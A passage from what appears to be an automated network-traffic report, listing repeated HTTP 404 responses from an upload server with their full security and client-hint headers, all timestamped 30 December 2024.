ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5jux0iU5fNHlHmzifbPL-V3MsFSwXvcCatqIIP1v1f9Ut_eFAs14giCVRqWGmXh_2RContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:41 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-5GwATmorsfyUrXLyXgICJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6LEldmyVtq1I0dZB6tvLPuK6yC_Y7ZD6XTgWdx3gT3KiFE6rbV2PQqfb3oV-IIzA5e6LP8p28Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:42 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IslGZ1Sr9Ws93cxFlpmqRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6aJCs7LypraYTT4-ESRkuEpyqMixg-7eCxiNTRF9Kj6A46X3l6CTAlcmVd5p9rhguKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:42 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-t5zpjG22om98qdy5ZMnG0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Ey4jYJWFMZ3kTQHVfi5EqgF5cYJ8ZKhMFhtHYaS1BHxTEdMc-UtSW-HvFG4tITNP83Fh3iLIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:43 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-6vfhRP9RCUfnS6f_ms_dNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ijVgIL3hiezj_7lKE67IOlzlgLTM_UijCaFOnIxMnVz4ZahfxzPwJtKINzzzNbyQpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-vMLjO7_-RWbXTbCcD8tE6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Dty4-IaLGjwdlXiIAYppWibQFM7vQai4m69uZ3k7_TD_4wCFuJ_BJ1mhyhmP0Fgm_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-sRJjcQAbP00dM9LDOzoawg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC418X1USi24Bw7w0INA1ioDTjvJc9d__D49ZEzlcl-ewiJi4WOG6ss0wxAZTgjyWDugCpw0iP8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eYKfmEPJlh6HOX7era-ueQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6i05ZmoSTcfdBDubAg_ZLwyrl3uQP93IheTvSsGiO9PcKO0GIgCv68TVF8RzQQaAXfCL-IkJ0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:45 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-kJB-Bp7LAYnITYsJE7t17A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7AhhjpIL1Bq8HwZ7Hj_f8FmM_qaYZx-sWoEo9UUtDn_9o-K5Zkk5P6h7F7YrZ8dJMzZYGHB5EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:46 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-OP74qrCDO80YX0KNG1IzYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5OQzorC_VRjjX91Eqr639HPJt6Ex0xcQM8dCajVRyhvtaykcIp1lRcHxj7-p5OqkCDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6WdV3s622MRrNsEv6h-DZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7sJu-SL0N5mzEfzGbZXJbejdKpavIyM1v9v6QTaSeygv_ktc1Y-Pz3ggFkoxrcXd6vContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:47 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xXB9wz8cNx2a8xNRmRL6KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5pQD3No1ypbTfx7PvASXBqIbdAH8d5K0uu7YQQQ2LHk8OKa2Ul4vKBWW4m4fpNUX15q4T5EJQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:48 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5bylDbVJyegCWBl8Fetrhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Xtnm1YVCBj1g6Lk_Trfvx1Bsit2YY-n8hnozM9gK6ZXBYGAyJLtHlxkJeXKgP2i3-8isZXcsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:48 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-JkAS7PjkOkv0bfdkwH9hyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45Il4GCSjEZv_NmyOjz94b8tzFKZutokNLBWNlknnfhAk1YUAKdGVj15exIK7GdmZxjkkXlqwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:49 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-f0ZCDQSXsFTEfjEEBHttUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4lhRc7kI1H-7ND--89oA0PHovE6MFe6SeLvsYQdfyn_-s8bUHnYVukT5nYAx2Umc9fContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-AtBr2WPl96avxnZ9M590Yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7B8J-w27zhAm1ALhObn4luC2q2_rzR_PqIJGMakPB1xSoKPjMSFeIjZT-oMerVwKHMqXFQt5oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-miCajQDKrthPwyws8g76ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6RbeOfp6JXwP5iQZw1PDY8rOeVzI3p2gDOR8zgMmljhjgSFSmnT5prkK1IYGkdX_2C41wx2IEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:52 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zlm4UgkhaA9witfbkbXu3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4A-q_zcd39YnCJK9hh-oQ6O3WyIzEb1YAUJfO3G1LxG1Pvi5hVgthcae9tC_ye0wyVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:52 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ILeC2Zcb0O5J7GMk2B98dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5_OJ-cVcgChkWmhLs4YNM-FVDAL4T9Hwj9hiZ-wYt6jO65Ihr3vg4-vDKOiL9-N8RRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:53 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-aDqmbB-n_XGalbm7iEHvIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6XEe4RhX42xTNE9domJU0eLuYzfZ78rmXMLbZ-pedMBBgSfR2uPjZdEOBmqrqmmisnoIe0BcMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:54 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-9nlj1GBjXGNUvF09q5Whrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
